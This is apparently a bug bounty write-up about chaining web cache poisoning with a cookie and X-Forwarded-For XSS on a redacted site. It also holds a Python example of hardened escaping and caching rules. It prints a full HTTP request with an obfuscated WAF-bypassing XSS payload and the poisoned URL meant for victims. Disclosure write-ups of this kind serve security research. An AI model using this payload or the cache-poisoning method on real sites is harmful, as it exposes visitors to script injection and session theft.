Bounty: $2,000
While Google Dorking, I found a particular URL that was not being cached, but if I added a cacheable file extension (.js, .css) at the end of the URL, it would cache the response.
Now, all I needed was to find an XSS. I found an injection point in a cookie, but the WAF would trigger when I added anything after %20
Cookie: cookiename=xss</script%20
While trying to bypass the WAF, I realized that my IP was also being reflected in that same script.
guid="</script ","24.99.19.20"
Since my IP was being reflected, I tried the “X-Forwarded-For” header; this way I could close the <script> and avoid the WAF, as it would trigger if it detected <[anything]>
This is why you will see three “X-Forwarded-For” headers
GET /xxx/xx/xxx.xx/x.js?t=2021111121 HTTP/2
Host: Redacted
X-Forwarded-For: xss
X-Forwarded-For: xss><svg/onload=globalThis[`al`+/ert/.source]`1`// X-Forwarded-For: >
Cookie: gdId=xss</script%20
...
guid="</script ","24.99.19.20","xss","xss><svg/onload=globalThis[`al`+/ert/.source]`1`//,">
...
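The two weaknesses above are independent: a cache that keys on the URL suffix, and an origin that drops an unkeyed header value (here the client IP) straight into an inline script string. Below is an added example, not the program's own code, modelling both decisions with hypothetical helper names (js_string_literal, is_cacheable_by_extension, is_cacheable_by_content, trusted_client_ip) and constructed sample values; it shows the weak behaviour beside a hardened version.

```python
import ipaddress
import json
import re
from urllib.parse import urlsplit


def js_string_literal(value: str) -> str:
    """JSON-encode a value for use inside an inline <script>. json.dumps
    already escapes quotes, backslashes and U+2028/U+2029 (ensure_ascii);
    we additionally escape < > & so '</script' can never break out of the
    element, whatever the surrounding WAF does."""
    return (json.dumps(value)
            .replace("<", "\\u003c").replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def render_guid_script_unsafe(client_ip: str) -> str:
    # The pattern seen in the write-up: untrusted text inside a JS string.
    return f'<script>guid="{client_ip}"</script>'


def render_guid_script_safe(client_ip: str) -> str:
    # Hardened: the value is emitted as an escaped JS literal.
    return f'<script>guid={js_string_literal(client_ip)}</script>'


def trusted_client_ip(xff_values: list[str], fallback: str) -> str:
    """Only accept the X-Forwarded-For value if it parses as an IP address;
    anything else (markup, repeated headers) falls back to the socket peer."""
    for raw in xff_values:
        candidate = raw.split(",")[0].strip()
        try:
            return str(ipaddress.ip_address(candidate))
        except ValueError:
            continue
    return fallback


def is_cacheable_by_extension(url: str) -> bool:
    # Weak rule from the write-up: a .js/.css suffix alone makes it cacheable.
    return bool(re.search(r"\.(js|css)$", urlsplit(url).path))


def is_cacheable_by_content(content_type: str, cache_control: str) -> bool:
    # Hardened rule: the origin must opt in and the body must be a static
    # asset type; an HTML page named x.js is not stored.
    static_types = {"application/javascript", "text/javascript", "text/css"}
    mime = content_type.split(";")[0].strip().lower()
    cc = cache_control.lower()
    return "public" in cc and "no-store" not in cc and mime in static_types
```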
After poisoning a URL with an XSS, an attacker just needed to send it to the victim
redacted.com/xxx/xx/xxx.xx/x.js?t=2021111121
A nice way to hide XSS :D
This was my favorite cache poisoning, and it was found on a public program; hopefully we can disclose this in the near future :)